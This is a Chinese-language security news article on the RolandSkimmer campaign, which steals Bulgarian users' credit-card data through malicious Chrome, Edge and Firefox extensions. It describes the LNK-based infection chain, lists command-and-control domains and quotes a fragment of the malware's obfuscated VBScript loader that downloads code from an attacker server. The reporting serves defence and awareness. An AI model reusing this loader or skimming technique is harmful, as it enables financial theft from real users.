一种复杂的新型信用卡盗刷活动已经出现，名为 RolandSkimmer，主要通过恶意浏览器扩展程序瞄准保加利亚的用户。

该攻击以其有效负载中嵌入的独特字符串 “Rol@and4You” 命名，它标志着基于网络的金融盗窃技术有了令人担忧的发展变化。

这种恶意软件会系统地从受害者那里获取敏感的支付信息，同时通过被攻陷的网络浏览器持续访问受害者的系统。

攻击始于一个名为 “faktura_3716804.zip” 的欺骗性压缩文件，里面包含一个看似无害的快捷方式文件。

一旦这个 LNK 文件被执行，它就会启动一系列复杂的经过混淆处理的脚本，从而建立对受害者系统的秘密访问通道。

与直接针对电子商务网站的传统盗刷器不同，RolandSkimmer 专注于攻陷浏览器本身，形成一种会跟随用户访问多个网站的持续性威胁。

RolandSkimmer 特别危险的地方在于它采用了多浏览器攻击方式，通过定制的恶意扩展程序同时瞄准 Google Chrome、Microsoft Edge 和 Mozilla Firefox。

这些扩展程序会请求广泛的权限，包括读取所有网页内容、修改网络请求以及访问浏览数据的能力，从而能够全面监控受害者的在线活动。

攻击者采用了复杂的混淆技术来逃避检测，使用了异或（XOR）编码的有效负载和动态生成的组件。

Fortinet 的研究人员在 2025 年 3 月发现了这一攻击活动，并记录了恶意软件是如何通过创建隐藏文件夹和修改浏览器快捷方式来实现持续存在的。

FortiGuard Labs 在其最近的分析中指出：“这代表了金融盗窃恶意软件中一个令人担忧的趋势。” 并强调了这种威胁所具备的复杂逃避检测机制和跨浏览器攻击能力。

RolandSkimmer 背后的操作者构建了一个精心设计的命令与控制基础设施，涉及多个域名，包括 invsetmx [.] com、exmkleo [.] com 和 bg3dsec [.] com。

这些服务器会发送恶意有效负载，并充当被盗取的金融数据的收集点。每个受害者都被分配了一个唯一的跟踪标识符，以便在浏览会话中监控他们的活动。

感染机制和扩展程序部署

最初的感染过程始于用户解压并点击恶意的 LNK 文件，这会执行一系列经过大量混淆处理的脚本链。

这个脚本会连接到攻击者的服务器，并下载伪装成虚假扩展程序的其他组件。

其中一个关键组件伪装成一个 JPEG 图像文件（n.jpg），但实际上包含直接在内存中执行而不会写入磁盘的 VBScript 代码。

on error resume next:q1=”8a9b1c3″:for q2=1 to 76046:if q7=q6 then:q8=””:else:q8=q6:

q7=q6:end if:Set q3=CreateObject(“MSXML2.ServerXMLHTTP.6.0”):q3.open “GET”,

“http://invsetmx.com/default.aspx?V=”&q2&”&R=#-@-“&q8,False:q3.send:q4=Split(

q3.responseText,”-@-“):if q5=q4(1) then:else:q5=q4(1):q9 = “”:For w1=1 to Len(q4(1))

然后，恶意软件会进行系统侦查，收集环境细节，包括检查已安装的浏览器和硬件规格。

对于 Microsoft Edge，它会在 “% APPDATA%..\Local\s2ch97” 路径下创建一个文件夹，里面包含一个伪装成 “禁用内容安全策略（Disable Content Security Policy）” 的恶意扩展程序。

这个扩展程序的清单请求了广泛的权限，包括 “declarativeNetRequest”、“browsingData”、“tabs” 和 “storage”。

该扩展程序的后台脚本会监控所有网站上的表单提交情况，专门瞄准信用卡号码。当检测到支付详情时，恶意代码会在被盗取的数据后面附加独特的标记 “Rol@and4You”，并通过页面中的隐藏元素将数据泄露到远程服务器上。

这种精心设计的攻击链使得攻击者无需提升权限就能持续访问，让他们能够长期访问受害者的浏览器和金融信息。